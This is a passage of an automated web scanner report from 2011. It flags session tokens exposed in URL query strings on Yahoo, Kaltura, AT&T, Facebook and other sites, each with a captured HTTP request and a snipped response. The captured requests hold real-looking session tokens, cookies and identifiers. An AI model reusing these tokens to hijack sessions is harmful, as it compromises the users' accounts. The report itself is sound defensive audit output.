10.8. http://omg.yahoo.com/xhr/ad/LREC/2115806991  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115806991

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:51 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 1
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5021

<html><body><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=v0zEHmKIOPqdxiLuTnPvXhRLMhd7ak5z72MAAaAs&ad_type=iframe&ad_siz
...[SNIP]...

10.9. http://omg.yahoo.com/xhr/ad/LREC/2115823648  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115823648

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:28 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5420

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316220868&token=rE_K3wmDgDcp.skuHZxJU95qxtSeDSAbgR1JN1zHhvbtyVvUNHZ_GNei9RTpc7VFUyvZti._YS.SLSIEoCRKbvcFIOBPuM1FkhFh6BAZg4.x.B69YQriCuYwYiCIz8n1AdB1qqHFNoOHGEr6RV1G1lFaAemkDBXSwwG.2SMFhcmcdbq.gGPiYKbT1g4htHmpKnKj5GdjPfdtnp1xpmBOcgpqwi0rB6Eno9pas3PwC_n0qsmdIwy55Sns5aiCF4m41Cid09zoUOYUTUG2EWsMUon5qoRfXblMuKWv..gIOQbeRXwfBultCFc8SxqHx3Z2h_iPcgCQSOJTWzeeCs7fn38_sis4P5oLajT9JARFHM2imYRmwO_1648kcHBCJ5B.52AvA8QGVYXK007NHMHwPZRYm1I..ijTZinP1so.8hdV3Lm1FCyJsFAmHgb_TINOMe7pV8tX1UiGZa9M0aCbXWJaOFxfVyxox9cl5wp_FmGEM_ECgezcPsyhRiITVwTOvYiMwGCt8b_jzhQsUQPc9nJZbwCnct5UaTnwxLqDZtvdKnjQDnubu..RlxWrAw5ftCS_9Nmupgx10IkkYM7CW80mkM_fJHj.4JuF&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=rE_K3wmDgDcp.skuHZxJU95qxtSeDSAbgR1JN1zHhvbtyVvUNHZ_GNei9RTpc7VFUyvZti._YS.SLSIEoCRKbvcFIOBPuM1FkhFh6BAZg4.x.B69YQriCuYwYiCIz8n1AdB1qqHFNoOHGEr6RV1G1lFaAemkDBXSwwG.2SMFhcmcdbq.gGPiYKbT1g4htHmpKnKj5GdjPfdtnp1xpmBOcgpqwi0rB6Eno9pas3PwC_n0qsmdIwy55Sns5aiCF4m41Cid09zoUOYUTUG2EWsMUon5qoRfXblMuKWv..gIOQbeRXwfBultCFc8SxqHx3Z2h_iPcgCQSOJTWzeeCs7fn38_sis4P5oLajT9JARFHM2imYRmwO_1648kcHBCJ5B.52AvA8QGVYXK007NHMHwPZRYm1I..ijTZinP1so.8hdV3Lm1FCyJsFAmHgb_TINOMe7pV8tX1UiGZa9M0aCbXWJaOFxfVyxox9cl5wp_FmGEM_ECgezcPsyhRiITVwTOvYiMwGCt8b_jzhQsUQPc9nJZbwCnct5UaTnwxLqDZtvdKnjQDnubu..RlxWrAw5ftCS_9Nmupgx10IkkYM7CW80mkM_fJHj.4JuF&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.10. http://omg.yahoo.com/xhr/ad/LREC/2115823648  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/LREC/2115823648

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/ad/LREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:28 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5420

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...

10.11. http://omg.yahoo.com/xhr/ad/MREC/2115823648  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/MREC/2115823648

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xhr/ad/MREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:51 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5421

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316220891&token=J_Bz2BuDgDf0Bhm4DQOS3yVgdKRQm1rKCL9MnazyXxHFAbyT4UmovlqbTDPtS5a3XZdPctWnPM6tHb_FvPtQJ4.auwW0twhhG.o12UcV4Y0Myh0D4UIkr8gk4iPRjk.Ot.6OEjk1Y4BrpkaJyHveZSEBMIB_FowWw14mju0tV1ANZWqSwoBNrxZFORIcSdmtv_b4GBuCJwxO2DnGRpF9t2QeVxYY80k52jylx1.kAXExx42035Eda86bSnA_JbVOxTzw7UUhIrXjB17PbwQqSl_ugppr1Ka_nVqfy6gSs7SW8CqN80y3CgC0urWIFvcc85zNedmGSgiIzLTk6gcnH0R0WtkBEo33jiEkkM79Vhbzo5w_U9PzQn0wasNm1GD1hGiwYo3ZCVijUFq7jVE2EsL4.XlF7gy9cSm35hKUiHTfi_4wFphSm2IN.F3ZwiVD_pWX6HGNEQR6rqNqw2_eylhmkmFTbsCl1NTtM59zxAX3i.f.MwEBB2Xxan5jp.LO.TfLCGWsSS6OXnDRK.h2pyPhI50SOOrSryEVzjtI_oUEYZKPuJ8_W2F_Ujeh.2tvURDkzOKWQovRE0zVcYHUGxejQ.JHMm.T4RJ7&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=J_Bz2BuDgDf0Bhm4DQOS3yVgdKRQm1rKCL9MnazyXxHFAbyT4UmovlqbTDPtS5a3XZdPctWnPM6tHb_FvPtQJ4.auwW0twhhG.o12UcV4Y0Myh0D4UIkr8gk4iPRjk.Ot.6OEjk1Y4BrpkaJyHveZSEBMIB_FowWw14mju0tV1ANZWqSwoBNrxZFORIcSdmtv_b4GBuCJwxO2DnGRpF9t2QeVxYY80k52jylx1.kAXExx42035Eda86bSnA_JbVOxTzw7UUhIrXjB17PbwQqSl_ugppr1Ka_nVqfy6gSs7SW8CqN80y3CgC0urWIFvcc85zNedmGSgiIzLTk6gcnH0R0WtkBEo33jiEkkM79Vhbzo5w_U9PzQn0wasNm1GD1hGiwYo3ZCVijUFq7jVE2EsL4.XlF7gy9cSm35hKUiHTfi_4wFphSm2IN.F3ZwiVD_pWX6HGNEQR6rqNqw2_eylhmkmFTbsCl1NTtM59zxAX3i.f.MwEBB2Xxan5jp.LO.TfLCGWsSS6OXnDRK.h2pyPhI50SOOrSryEVzjtI_oUEYZKPuJ8_W2F_Ujeh.2tvURDkzOKWQovRE0zVcYHUGxejQ.JHMm.T4RJ7&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.12. http://omg.yahoo.com/xhr/ad/MREC/2115823648  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/ad/MREC/2115823648

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xhr/ad/MREC/2115823648?ref=aHR0cDovL3d3dy55YWhvby5jb20v&token=b475da4881df940801d7698aa9d116ab HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:51 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5421

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...

10.13. http://omg.yahoo.com/xhr/relatedsearch/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://omg.yahoo.com
Path:   /xhr/relatedsearch/

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xhr/relatedsearch/?p=Elle%20Fanning%2C%20Dakota%20Fanning&uri=/photos/what-were-they-thinking/5203 HTTP/1.1
Host: omg.yahoo.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/photos/what-were-they-thinking/5203
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adxid=016e3b4e6615bdb5; AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223.1071929@2@223.3078101@1@234; tiles=15048

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sat, 17 Sep 2011 00:54:51 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.20.7
Content-Length: 5444

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1316220891&token=V2rJMieDgDcSeRr8MYEIOGHH4.1A83mMjrBNRo1jMtxxInVMiGzXKvnBZTCOZkIGMg9oJuaLMkikVDbQt1XuaRoL3._ubSDf7HiWYf1e6GtJu0c0FBJqe8laXhUyQeFrjmnSKunNg1p52a8aILBDuHUwTBrFd1w.seKlc3dvirPCWFe7.bK199dDBwyqKaGB.nAnRmYaRYfIlYOr09dpaI6LzI9mGZkJArJZA48ImaDSCXFVXFOcrSNX0zZJ1fMqalYn9RA0XIotfJSO24PP5HX0qRxwm7J4xo_fdDN6tYOJEyM.mcVTMoMgd8AkgR0tUfpAGKEkzTPVVP7XPEsLHar96y46TKna5J16RrwWBqu8MwCmQ0iLEIcpN3d5ZCw_WYpeYqgvia1NfMdhkLjD6oTO5Zy8PepfSpNBkONDYA.u2F8DaN7GNWx84IAC_DKHyI_7kAwaQ2Mkx9xN4zNUmNCxP2S2RjJvEaLLKKcPZd8rtPzYgff8mcJeYUaCKT3vuq32_Lko91yjx08FRYXL1r16Bct4S_B0Aw2b6z8RiDgGJelITHJdsMHlQcPwiP7wyoG1RMX5rD73xSOCLBGuQv1aHkS04WOOcuOfd19Kak_wsRQ-&srv=omg.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=V2rJMieDgDcSeRr8MYEIOGHH4.1A83mMjrBNRo1jMtxxInVMiGzXKvnBZTCOZkIGMg9oJuaLMkikVDbQt1XuaRoL3._ubSDf7HiWYf1e6GtJu0c0FBJqe8laXhUyQeFrjmnSKunNg1p52a8aILBDuHUwTBrFd1w.seKlc3dvirPCWFe7.bK199dDBwyqKaGB.nAnRmYaRYfIlYOr09dpaI6LzI9mGZkJArJZA48ImaDSCXFVXFOcrSNX0zZJ1fMqalYn9RA0XIotfJSO24PP5HX0qRxwm7J4xo_fdDN6tYOJEyM.mcVTMoMgd8AkgR0tUfpAGKEkzTPVVP7XPEsLHar96y46TKna5J16RrwWBqu8MwCmQ0iLEIcpN3d5ZCw_WYpeYqgvia1NfMdhkLjD6oTO5Zy8PepfSpNBkONDYA.u2F8DaN7GNWx84IAC_DKHyI_7kAwaQ2Mkx9xN4zNUmNCxP2S2RjJvEaLLKKcPZd8rtPzYgff8mcJeYUaCKT3vuq32_Lko91yjx08FRYXL1r16Bct4S_B0Aw2b6z8RiDgGJelITHJdsMHlQcPwiP7wyoG1RMX5rD73xSOCLBGuQv1aHkS04WOOcuOfd19Kak_wsRQ-&.intl=us&srv=omg.yahoo.com">let us know</a>
...[SNIP]...

10.14. http://stats.kaltura.com//api_v3/index.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://stats.kaltura.com
Path:   //api_v3/index.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET //api_v3/index.php?service=stats&action=collect&kalsig=a9b4dfa3b9a7d5c7ec9588b88d5c7e5c&event%3AcurrentPoint=0&ignoreNull=1&event%3AentryId=1%5F6mbkzzuu&event%3Aduration=0&event%3ApartnerId=591531&event%3AeventType=2&event%3Aseek=false&event%3AuiconfId=4899061&event%3AeventTimestamp=1316238793563&event%3AclientVer=3%2E0%3Av3%2E5%2E17%2E6&ks=YTk5YWE2N2NiYmM1ZmFkNWIyNTE4OWU3ZjliZjFkZDMwNTRkZDk0ZXw1OTE1MzE7NTkxNTMxOzEzMTYzMDcwNjY7MDsxMzE2MjIwNjY2LjI3NDI7MDt2aWV3Oio7Ow%3D%3D&event%3AsessionId=3DFD40F9%2D5AB1%2D666F%2DAF9E%2D75F250D566D3&event%3Areferrer=http%253A%2F%2Fwww%2Etmz%2Ecom%2F&event%3AisFirstInSession=false&event%3AobjectType=KalturaStatsEvent&clientTag=kdp%3Av3%2E5%2E17%2E6 HTTP/1.1
Host: stats.kaltura.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 11 Aug 2011 11:14:14 GMT
ETag: "f357c-7-4aa38e59ced80"
X-Me: ny-apache3
X-UA-Compatible: IE=EmulateIE7
Content-Length: 7
Content-Type: text/html; charset=UTF-8
Expires: Sat, 17 Sep 2011 00:52:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:52:06 GMT
Connection: close
Vary: Accept-Encoding

Kaltura

10.15. http://wls.wireless.att.com/dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://wls.wireless.att.com
Path:   /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /dcsw1sx8x45vbwmw7v63tbf8m_1h2f/dcs.gif?&dcsdat=1316239905122&dcssip=www.att.com&dcsuri=/u-verse/availability/&dcsref=http%3A//attuverseoffers.com/tv_hsi_bundles/index.php%3FsendVar%3D20State_49PromoOffer%26source%3DECbc0000000WIP00O%26fbid%3D9Lm6uVSxV_u&WT.tz=-5&WT.bh=1&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Check%20AT%26T%20U-verse%20Availability%20-%20Digital%20TV%2C%20High%20Speed%20Internet%20%26%20Phone&WT.js=Yes&WT.bs=1087x870&WT.fi=Yes&WT.fv=10.3&WT.vt_sid=123&wtStatusCode=0&wtSuccessFlag=1&browserid=A001722225240&wtPN=Uverse%20Check%20Availability%20Address%20Pg&sessionid=Q2lRTzzXGBJTxL%21-1935813224%211316221815837&flowtype=UVERSE&wtCustType=Consumer&wtCustTypeSub=Residential&wtBuyFlowType=PROVIDE HTTP/1.1
Host: wls.wireless.att.com
Proxy-Connection: keep-alive
Referer: http://www.att.com/u-verse/availability/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cust_type=new; browserid=A001722225240; svariants=NA; ECOM_GTM=owbth_NA_NA_NA_ostdbth; __utma=52846072.845099683.1315325061.1315325061.1315325061.1; __utmz=52846072.1315325061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713484570324388; ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQwAAAAAAAAAAABAAAAAgAAAPjxc0748XNOAQAAAAEAAAD48XNO+PFzTgEAAAACAAAAIDUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQw; TLTHID=CD44864EE0C910E0095E9C3AFD3198B7; TLTSID=CD44864EE0C910E0095E9C3AFD3198B7; TLTUID=CD44864EE0C910E0095E9C3AFD3198B7; fsr.a=1316239904414; fsr.s=

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Thu, 07 Oct 2010 01:40:46 GMT
Accept-Ranges: bytes
ETag: "0a360a9c065cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQwAAAAAAAAAAABAAAAAgAAAEn9c06N+nNOAQAAAAEAAABJ/XNOjfpzTgEAAAACAAAAIDUwLjIzLjEyMy4xMDYtOTY5NDI1MzYwLjMwMTc0MzQw; path=/; expires=Tue, 14-Sep-2021 01:52:09 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Date: Sat, 17 Sep 2011 01:52:08 GMT
Connection: close
Content-Length: 43

GIF89a.............!.......,...........D..;

10.16. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=238200696226156&app_id=238200696226156&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df383cf9afc%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b7a2f254%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1bd702454%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df352a5d3c8%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22089c0e8%26origin%3Dhttp%253A%252F%252Fforums.cpanel.net%252Ffda116178%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e0f2bec8&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://forums.cpanel.net/f43/connection-imap-server-failed-96021.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.63.22.49
X-Cnection: close
Date: Fri, 16 Sep 2011 19:42:58 GMT
Content-Length: 245

<script type="text/javascript">
parent.postMessage("cb=f352a5d3c8&origin=http\u00253A\u00252F\u00252Fforums.cpanel.net\u00252Ffda116178&relation=parent&transport=postmessage&frame=f2e0f2bec8", "http:\
...[SNIP]...

10.17. http://www.itoncommand.com/GetAQuote.aspx  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.itoncommand.com
Path:   /GetAQuote.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /GetAQuote.aspx?utm_source=google&utm_medium=cpc&utm_term=VDI&utm_campaign=Campaign%20 HTTP/1.1
Host: www.itoncommand.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=virtual+desktop#pq=vdi&hl=en&sugexp=gsis%2Ci18n%3Dtrue&cp=7&gs_id=w&xhr=t&q=vdi+hosting&pf=p&sclient=psy-ab&source=hp&pbx=1&oq=vdi+hos&aq=0&aqi=g1g-v3&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b659e1e8b520709&biw=1087&bih=870
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Sat, 17 Sep 2011 00:25:45 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Cache-Control: private
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
MS-Author-Via: MS-FP/4.0
Vary: Accept-Encoding
Content-Length: 38069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html dir="ltr" xmlns="http://www.w3.org/1999/xhtml">

<head><meta name="
...[SNIP]...
<noscript>
<img src="https://27.xg4ken.com/media/redir.php?track=1&token=7a824604-6d82-4048-a8bd-c1008da1556e&type=conv&val=0.0&orderId=&promoCode=&valueCurrency=USD" width="1" height="1">
</noscript>
...[SNIP]...

10.18. http://www.matrix42.com/new-to-matrix42/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.matrix42.com
Path:   /new-to-matrix42/

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /new-to-matrix42/?PHPSESSID=721gl7390nj2pm26demj4h2ha7 HTTP/1.1
Host: www.matrix42.com
Proxy-Connection: keep-alive
